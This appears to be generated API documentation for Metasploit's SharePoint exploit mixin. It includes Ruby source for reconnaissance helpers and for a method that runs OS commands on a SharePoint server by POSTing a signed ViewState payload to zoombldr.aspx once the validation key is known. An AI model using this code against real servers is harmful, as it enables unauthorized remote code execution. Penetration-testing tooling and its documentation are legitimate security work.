Module: Msf::Exploit::Remote::HTTP::Sharepoint

Includes:
Msf::Exploit::Remote::HttpClient, ViewState
Defined in:
lib/msf/core/exploit/remote/http/sharepoint.rb

Overview

This module provides a way of interacting with SharePoint installations.

Instance Attribute Summary

Attributes included from Msf::Exploit::Remote::HttpClient

#client, #cookie_jar

Instance Method Summary

Methods included from ViewState

#can_sign_viewstate?, #decode_viewstate, #extract_viewstate, #extract_viewstate_generator, #extract_viewstate_validation_key, #generate_viewstate, #generate_viewstate_hmac, #generate_viewstate_payload, #initialize, #pack_viewstate_generator, #pack_viewstate_validation_key

Methods included from Msf::Exploit::Remote::HttpClient

#basic_auth, #cleanup, #configure_http_login_scanner, #connect, #connect_ws, #deregister_http_client_options, #disconnect, #download, #full_uri, #handler, #http_fingerprint, #initialize, #lookup_http_fingerprints, #normalize_uri, #path_from_uri, #peer, #proxies, #reconfig_redirect_opts!, #request_opts_from_url, #request_url, #rhost, #rport, #send_request_cgi, #send_request_cgi!, #send_request_raw, #service_details, #setup, #ssl, #ssl_version, #sslkeylogfile, #strip_tags, #target_uri, #validate_fingerprint, #vhost

Methods included from Auxiliary::LoginScanner

#configure_login_scanner

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Instance Method Details

#sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) ⇒ nil

Execute an operating system command by crafting and sending a viewstate to the remote server. In order for this to work, the validation_key must be known.

Parameters:

  • cmd (String)

    The OS command to run on the remote system

  • validation_key (String)

    The remote system's validation key from the web.config file.

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (nil)

    This method does not return a value.

Raises:

  • (RuntimeError)

    This method raises a RuntimeError via #fail_with if the target does not respond or the command fails to execute (non-200 response).


# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 24

# Execute an operating system command by crafting a signed __VIEWSTATE and
# POSTing it to /_layouts/15/zoombldr.aspx. The server only accepts the
# viewstate when it is signed with the correct validation key, so the key
# must already be known to the caller.
#
# @param cmd [String] The OS command to run on the remote system.
# @param validation_key [String] The remote system's validation key from
#   the web.config file.
# @param http_request_opts [Hash] Options to override the defaults of the
#   HTTP request; the method/uri/vars_post set here take precedence.
# @return [nil] This method does not return a value.
# @raise [RuntimeError] Raised via #fail_with when the target does not
#   respond (Failure::Unreachable) or when the response status is not 200
#   (Failure::PayloadFailed).
def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {})
  vprint_status("Executing command: #{cmd}")

  uri = normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx')

  # Viewstate generator for /_layouts/15/zoombldr.aspx (fixed per page).
  viewstate = generate_viewstate_payload(
    cmd,
    extra: pack_viewstate_generator('63E6434F'),
    algo: 'sha256',
    key: pack_viewstate_validation_key(validation_key)
  )

  request = http_request_opts.merge(
    'method' => 'POST',
    'uri' => uri,
    'vars_post' => { '__VIEWSTATE' => viewstate }
  )
  res = send_request_cgi(request)

  fail_with(Failure::Unreachable, "Target did not respond to #{__method__}") unless res
  fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}") unless res.code == 200

  vprint_good('Successfully executed command')
end

#sharepoint_get_site_web_id(http_request_opts = {}) ⇒ String?

Get the site’s webID.

Parameters:

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (String, nil)

    The webID if it could be recovered, otherwise nil.


# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 55

# Get the site's webID by requesting the REST endpoint _api/web/id and
# reading the text of the first //d:Id element in the XML response.
#
# @param http_request_opts [Hash] Options to override the defaults of the
#   HTTP request; method and uri set here take precedence.
# @return [String, nil] The webID, or nil when there is no response, the
#   response status is not 200, or the //d:Id element is absent.
def sharepoint_get_site_web_id(http_request_opts = {})
  request = http_request_opts.merge(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id')
  )
  res = send_request_cgi(request)
  return nil if res.nil? || res.code != 200

  id_node = res.get_xml_document.at('//d:Id')
  id_node&.text
end

#sharepoint_get_version(http_request_opts = {}) ⇒ Rex::Version?

Get the SharePoint version number.

Parameters:

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (Rex::Version, nil)

    The SharePoint version if it could be recovered, otherwise nil.

See Also:


# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 72

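# Get the SharePoint version number from the MicrosoftSharePointTeamServices
# header of the site root response.
#
# @param http_request_opts [Hash] Options to override the defaults of the
#   HTTP request; method and uri set here take precedence.
# @return [Rex::Version, nil] The SharePoint version, or nil when the target
#   does not respond, the header is absent, or the header value does not
#   begin with a dotted build number.
def sharepoint_get_version(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path)
  }))

  # `&.` only guards the call immediately after it, so `res&.headers[...]`
  # raised NoMethodError (nil#[]) when the target did not respond instead
  # of returning nil as documented. Check the response explicitly.
  return nil unless res

  banner = res.headers['MicrosoftSharePointTeamServices']
  return nil unless banner

  # Take the leading dotted build number; \A anchors to the start of the
  # whole value rather than the start of any line.
  match = /\A(?<build>[\d.]+)/.match(banner)
  return nil unless match

  Rex::Version.new(match[:build])
end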